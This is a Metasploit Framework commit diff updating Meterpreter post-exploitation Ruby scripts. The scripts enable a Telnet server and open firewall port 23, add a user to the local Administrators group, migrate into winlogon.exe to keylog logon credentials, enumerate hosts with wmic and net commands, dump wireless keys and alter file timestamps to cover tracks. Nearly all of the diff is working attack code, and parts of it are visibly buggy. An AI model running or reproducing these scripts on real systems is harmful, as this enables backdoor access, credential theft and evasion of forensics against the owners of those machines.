Updated meterpreter scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6386 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
73e946ccf1
commit
02ab203dfd
|
@ -1,201 +1,212 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.2
|
||||
#Note: If the Telnet Server is not installed in Vista or win2k8
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows Vista)/
|
||||
if checkifinst(session)
|
||||
print_status("Telnet Service Installed on Target")
|
||||
else
|
||||
print_status("Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
else
|
||||
print "[*] Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
sleep(2)
|
||||
prog2check = "pkgmgr.exe"
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
print "."
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status("Finnished installing the Telnet Service.")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
end
|
||||
def usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
||||
|
|
|
@ -34,21 +34,15 @@ captype = 0
|
|||
"-c" => [ true, "Type of key capture. (0) for user key presses or (1) for winlogon credential capture Default is 0."]
|
||||
|
||||
)
|
||||
|
||||
#Function to Migrate in to Explorer process to be able to interact with desktop
|
||||
def explrmigrate(session,captype)
|
||||
def explrmigrate(session,captype,adm)
|
||||
begin
|
||||
print_status("Migrating process...")
|
||||
if captype.to_i == 0
|
||||
process2mig = "explorer.exe"
|
||||
elsif captype.to_i == 1
|
||||
# Check to make sure that process is running and system to be able to migrate to high priv process
|
||||
if (session.sys.config.getuid == "NT AUTHORITY\\SYSTEM")
|
||||
process2mig = "winlogon.exe"
|
||||
else
|
||||
print_status("\tYou are not currently running as System to be able to migrate to winlogon.")
|
||||
print_status("\tCapturing only logon user keystrokes.")
|
||||
process2mig = "explorer.exe"
|
||||
end
|
||||
process2mig = "winlogon.exe"
|
||||
else
|
||||
process2mig = "explorer.exe"
|
||||
end
|
||||
|
@ -70,8 +64,10 @@ end
|
|||
#Function for starting the keylogger
|
||||
def startkeylogger(session)
|
||||
begin
|
||||
print_status("Grabbing Desktop Keyboard Input...")
|
||||
session.ui.grab_desktop
|
||||
print_status("Starting the keystroke sniffer...")
|
||||
client.ui.keyscan_start
|
||||
session.ui.keyscan_start
|
||||
return true
|
||||
rescue
|
||||
print_status("Failed to start Keylogging!")
|
||||
|
@ -125,8 +121,11 @@ def keycap(session, keytime, logfile)
|
|||
end
|
||||
db.close
|
||||
rescue::Exception => e
|
||||
print("\n")
|
||||
print_status("#{e.class} #{e}")
|
||||
db.close
|
||||
print_status("Error: #{e.class} #{e}")
|
||||
print_status("Stopping keystroke sniffer...")
|
||||
session.ui.keyscan_stop
|
||||
end
|
||||
end
|
||||
def helpmsg
|
||||
|
@ -155,7 +154,8 @@ helpcall = 0
|
|||
|
||||
}
|
||||
if helpcall == 0
|
||||
if explrmigrate(session,captype)
|
||||
adm = checkifadm(session)
|
||||
if explrmigrate(session,captype,adm)
|
||||
if startkeylogger(session)
|
||||
keycap(session, keytime, logfile)
|
||||
end
|
||||
|
|
|
@ -3,7 +3,7 @@
|
|||
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
|
||||
# and Windows XP remote targets using native windows command wmic.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Verion: 0.1.0
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
|
@ -39,10 +39,17 @@ wmic = [
|
|||
'group list',
|
||||
'sysaccount list',
|
||||
'volume list brief',
|
||||
'logicaldisk get description,filesystem,name,size',
|
||||
'netlogin get name,lastlogon,badpasswordcount',
|
||||
'netclient list brief',
|
||||
'netuse get name,username,connectiontype,localname',
|
||||
'share get name,path',
|
||||
'nteventlog get path,filename,writeable',
|
||||
'service list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'product get name,version',
|
||||
'qfe list'
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
@ -75,7 +82,19 @@ def wmicexec(session,wmic,user,pass,trgt)
|
|||
sleep(1)
|
||||
#print_status "\twmic #{command}"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
#Making sure that wmic finnishes before executing next wmic command
|
||||
prog2check = "wmic.exe"
|
||||
found = 0
|
||||
sleep(2)
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
|
@ -122,6 +141,9 @@ end
|
|||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
|
@ -133,7 +155,19 @@ def winver(session)
|
|||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
# Read the output file of the wmic commands
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ /Windows Serverr 2008/
|
||||
version = "Windows 2008"
|
||||
elsif d =~ /Windows Vista/
|
||||
version = "Windows Vista"
|
||||
end
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
|
|
|
@ -1,20 +1,21 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
|
||||
# and Windows XP targets using native windows commands.
|
||||
#Windows 7 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.3.4
|
||||
#Verion: 0.3.5
|
||||
#Note: Compleatly re-writen to make it modular and better error handling.
|
||||
# Working on adding more Virtual Machine Checks and looking at improving
|
||||
# the code but retain the independance of each module so it is easier for
|
||||
# the code to be re-used.
|
||||
#Contributor: natron (natron 0x40 invisibledenizen 0x2E com) (Process Migration Functions)
|
||||
# inquis (bernardo.damele 0x40 gmail 0x2E com) (Minor Fixes)
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
host,port = session.tunnel_peer.split(':')
|
||||
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000))
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")+"-"+sprintf("%.5d",rand(100000))
|
||||
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.config_directory, 'logs', 'winenum', host + filenameinfo )
|
||||
|
@ -47,8 +48,12 @@ commands = [
|
|||
'net group administrators',
|
||||
'net view /domain',
|
||||
'netsh firewall show config',
|
||||
'tasklist /svc'
|
||||
|
||||
'tasklist /svc',
|
||||
'tasklist /m'
|
||||
]
|
||||
# Windows 2008 Commands
|
||||
win2k8cmd = [
|
||||
'oclist',
|
||||
]
|
||||
# Commands wich MACE will be changed
|
||||
cmdstomp = [
|
||||
|
@ -65,14 +70,21 @@ cmdstomp = [
|
|||
]
|
||||
# WMIC Commands that will be executed on the Target
|
||||
wmic = [
|
||||
'computersystem list',
|
||||
'computersystem list brief',
|
||||
'useraccount list',
|
||||
'group list',
|
||||
'service list brief',
|
||||
'volume list brief',
|
||||
'logicaldisk get description,filesystem,name,size',
|
||||
'netlogin get name,lastlogon,badpasswordcount',
|
||||
'netclient list brief',
|
||||
'netuse get name,username,connectiontype,localname',
|
||||
'share get name,path',
|
||||
'nteventlog get path,filename,writeable',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'product get name,version',
|
||||
'qfe',
|
||||
]
|
||||
#Specific Commands for Windows vista for Wireless Enumeration
|
||||
|
@ -184,7 +196,7 @@ def wmicexec(session,wmiccmds= nil)
|
|||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmicfl = tmp + "\\wmictmp.txt"
|
||||
wmiccmds.each do |wmi|
|
||||
print_status "\trunning command wimic #{wmi}"
|
||||
print_status "\trunning command wmic #{wmi}"
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
|
@ -193,6 +205,18 @@ def wmicexec(session,wmiccmds= nil)
|
|||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
#Making sure that wmic finnishes before executing next wmic command
|
||||
prog2check = "wmic.exe"
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes().each do |x|
|
||||
found =1
|
||||
if prog2check == (x['name'].downcase)
|
||||
sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
|
@ -364,6 +388,22 @@ def regdump(session,pathoflogs,filename)
|
|||
session.sys.process.execute("cmd.exe /c del #{windir}\\Temp\\HK*", nil, {'Hidden' => 'true'})
|
||||
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for extracting program list from registry
|
||||
def findprogs(session)
|
||||
print_status("Extracting software list from registry")
|
||||
proglist = ""
|
||||
session.sys.registry.create_key(HKEY_CURRENT_USER, 'Software').each_key() do |company|
|
||||
proglist << "#{company}"
|
||||
|
||||
session.sys.registry.create_key(HKEY_CURRENT_USER, "Software\\#{company}").each_key() do |software|
|
||||
proglist << "\t#{software}"
|
||||
end
|
||||
end
|
||||
print_status("Finnished Extraction of software list from registry")
|
||||
proglist
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function that will call 2 other Functions to cover all tracks
|
||||
def covertracks(session,cmdstomp)
|
||||
|
@ -504,6 +544,9 @@ end
|
|||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
wmitmptxt = tmp + "\\" + sprintf("%.5d",rand(100000))
|
||||
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
|
@ -515,9 +558,21 @@ def winver(session)
|
|||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic /append:#{wmitmptxt} os get name", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
# Read the output file of the wmic commands
|
||||
r = session.sys.process.execute("cmd.exe /c type #{wmitmptxt}", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ /Windows Serverr 2008/
|
||||
version = "Windows 2008"
|
||||
elsif d =~ /Windows Vista/
|
||||
version = "Windows Vista"
|
||||
end
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
version = "Windows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
|
@ -588,13 +643,20 @@ if helpopt != 1
|
|||
if trgtos =~ /(Windows XP)/
|
||||
filewrt(dest,list_exec(session,commands))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
elsif trgtos =~ /(Windows .NET Server)/
|
||||
elsif trgtos =~ /(Windows 2003)/
|
||||
filewrt(dest,list_exec(session,commands))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
elsif trgtos =~ /(Windows Vista)/
|
||||
filewrt(dest,list_exec(session,commands + vstwlancmd))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
filewrt(dest,findprogs(session))
|
||||
elsif trgtos =~ /(Windows 7)/
|
||||
filewrt(dest,list_exec(session,commands + vstwlancmd))
|
||||
filewrt(dest,wmicexec(session,wmic))
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
dumpwlankeys(session,logs,filenameinfo)
|
||||
elsif trgtos =~ /(Windows 2000)/
|
||||
filewrt(dest,list_exec(session,commands - nonwin2kcmd))
|
||||
|
|
Loading…
Reference in New Issue